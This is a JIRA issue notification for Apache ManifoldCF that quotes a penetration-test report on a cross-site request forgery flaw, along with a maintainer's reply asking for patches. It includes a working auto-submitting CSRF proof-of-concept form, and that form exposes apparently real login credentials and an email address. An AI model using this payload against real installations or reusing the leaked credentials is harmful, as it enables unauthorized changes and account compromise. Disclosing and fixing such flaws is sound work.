[
https://issues.apache.org/jira/browse/CONNECTORS-1595?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16803802#comment-16803802
]
Karl Wright commented on CONNECTORS-1595:
-----------------------------------------
[~goovaertsr]: For all of the security tickets you have submitted against MCF,
we have no ability to address these ourselves; this is a small project and
essentially you are attempting to make the MCF UI safe to operate in an open
web environment. That was not its design point, either at the beginning or
ever.
We are always receptive to patches, so if you have specific code changes you
want us to consider, please feel free to attach appropriate patches to the
tickets you have created.
Thank you.
> cross-site request forgery vulnerability
> ----------------------------------------
>
> Key: CONNECTORS-1595
> URL: https://issues.apache.org/jira/browse/CONNECTORS-1595
> Project: ManifoldCF
> Issue Type: Improvement
> Components: API
> Affects Versions: ManifoldCF 2.12
> Reporter: roel goovaerts
> Priority: Minor
>
> Below is the full analysis and description as a result from the penetration
> test.
> *Summary*
> The application is vulnerable to Cross-Site Request Forgery (CSRF).
> A cross-site request forgery attack uses the following scenario:
> 1. An attacker creates a web page that includes an image or a form pointing
> to the attacked application.
> The image source would actually be a URL with parameters pointing to the
> application page that
> performs some action. In case of a form, the form action would point to the
> action page in the target
> application, and the form is submitted automatically by JavaScript when the
> page is viewed.
> 2. The attacker tricks the victim user to browse to this page. The attacker
> may get the victim to click a
> link, or embed the attacking HTML code into some page the victim views, for
> example in a bulletin
> board or chat.
> 3. When the victim views the attacker's page, his browser sends a request
> prepared by the attacker to
> the attacked application. If the victim is logged in to the target
> application, his browser will possess
> all necessary session tokens, so the request will appear as authorized to the
> application and
> succeed.
> A cross-site request forgery attack uses the fact that the victim's browser
> possesses the necessary
> authentication tokens to perform some actions in the target application.
> *Impact*
> A remote, unauthenticated attacker that can trick an authenticated user into
> clicking a link crafted by the
> attacker or open a malicious web page, can force the victim to unknowingly
> perform various actions within
> the application.
> Given that the whole application is not protected against CSRF, any action
> that an administrator can take on
> Apache Manifold could be unknowingly performed if they fall for a CSRF attack.
> *Affected Systems*
> * [https://els-manifold-uat.bc:8475/mcf-crawler-ui/]
> *Description*
> It appears that the application does not implement any CSRF protection.
> Consider the following example. An
> attacker tricks a logged in application user to visit a page containing the
> following code:
> {code:java}
> <html>
> <!-- CSRF PoC - generated by Burp Suite Professional -->
> <body>
> <script>history.pushState('', '', '/')</script>
> <form action="https://els-manifold-uat.bc:8475/mcf-crawler-ui/execute.jsp";
> method="POST" enctype="multipart/form-data">
> <input type="hidden" name="op" value="Save" />
> <input type="hidden" name="type" value="connection" />
> <input type="hidden" name="tabname" value="Name" />
> <input type="hidden" name="isnewconnection" value="false" />
> <input type="hidden" name="connname" value="clix-fr" />
> <input type="hidden" name="description" value="" />
> <input type="hidden" name="classname"
> value="org.apache.manifoldcf.crawler.connectors.webcrawler.Webcr
> awlerConnector" />
> <input type="hidden" name="authorityname" value="_none_" />
> <input type="hidden" name="throttlecount" value="0" />
> <input type="hidden" name="maxconnections" value="10" />
> <input type="hidden" name="email"
> value="ferdi.klomp@craftworkz.nl" />
> <input type="hidden" name="robotsusage" value="none" />
> <input type="hidden" name="metarobotstagsusage" value="all" />
> <input type="hidden" name="regexp_bandwidth_0" value="" />
> <input type="hidden" name="insensitive_bandwidth_0" value="false" />
> <input type="hidden" name="connections_bandwidth_0" value="2" />
> <input type="hidden" name="rate_bandwidth_0" value="64" />
> <input type="hidden" name="fetches_bandwidth_0" value="12" />
> <input type="hidden" name="bandwidth_count" value="1" />
> <input type="hidden" name="acredential_count" value="0" />
> <input type="hidden" name="scredential_0_regexp"
> value="https://intrauat.web.bc/" />
> <input type="hidden" name="scredential_0_0_regexp" value="login"
> />
> <input type="hidden" name="scredential_0_0_type" value="form" />
> <input type="hidden" name="scredential_0_0_matchregexp"
> value="validation" />
> <input type="hidden" name="scredential_0_0_overridetargeturl"
> value=""
> />
> <input type="hidden" name="scredential_0_0_0_op"
> value="Continue" />
> <input type="hidden" name="scredential_0_0_0_param"
> value="username" />
> <input type="hidden" name="scredential_0_0_0_value"
> value="id996812" />
> <input type="hidden" name="scredential_0_0_0_password"
> value="" />
> <input type="hidden" name="scredential_0_0_1_op"
> value="Continue" />
> <input type="hidden" name="scredential_0_0_1_param"
> value="password" />
> <input type="hidden" name="scredential_0_0_1_value"
> value="Th1sIs4cl1X" />
> <input type="hidden" name="scredential_0_0_1_password"
> value="" />
> <input type="hidden" name="scredential_0_0_2_op"
> value="Continue" />
> <input type="hidden" name="scredential_0_0_2_param"
> value="login-form-type" />
> <input type="hidden" name="scredential_0_0_2_value"
> value="pwd" />
> <input type="hidden" name="scredential_0_0_2_password"
> value="" />
> <input type="hidden" name="scredential_0_0_loginparamcount"
> value="3" />
> <input type="hidden" name="scredential_0_loginpagecount" value="1" />
> <input type="hidden" name="scredential_count" value="1" />
> <input type="hidden" name="regexp_trust_0"
> value="https://intrauat.web.bc" />
> <input type="hidden" name="trustall_trust_0" value="false" />
> <input type="hidden" name="trust_count" value="1" />
> <input type="hidden" name="proxyhost" value="" />
> <input type="hidden" name="proxyport" value="" />
> <input type="hidden" name="proxyauthusername" value="" />
> <input type="hidden" name="proxyauthdomain" value="" />
> <input type="hidden" name="proxyauthpassword" value="" />
> <input type="hidden" name="client_timezone_offset" value="-60" />
> <input type="hidden" name="client_timezone" value="Europe/Zurich" />
> <input type="submit" value="Submit request" />
> </form>
> </body>
> </html>
> {code}
> When the victim's browser parses the page and tries to load images, it will
> cause them to execute any action
> of the attacker's choosing on Manifold.
> *Recommendations*
> The usual approach to preventing CSRF attacks is to add a new parameter with
> an unpredictable value to
> each form or link that performs some action in the application, commonly
> referred to as a CSRF-Token. The
> parameter value should have enough entropy so that it cannot be predicted by
> an attacker and should be
> unique to the current user session. When the user submits the form or clicks
> the link, the server side code
> checks the parameter value. If it is valid, the request is accepted,
> otherwise it is denied. The attacker has no
> way of knowing the value of the unpredictable parameter, so he cannot
> construct a form or link that will
> submit a valid request.
> *References*
> * OWASP - Cross-Site Request Forgery -
> [https://www.owasp.org/index.php/Cross-]
> Site_Request_Forgery
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
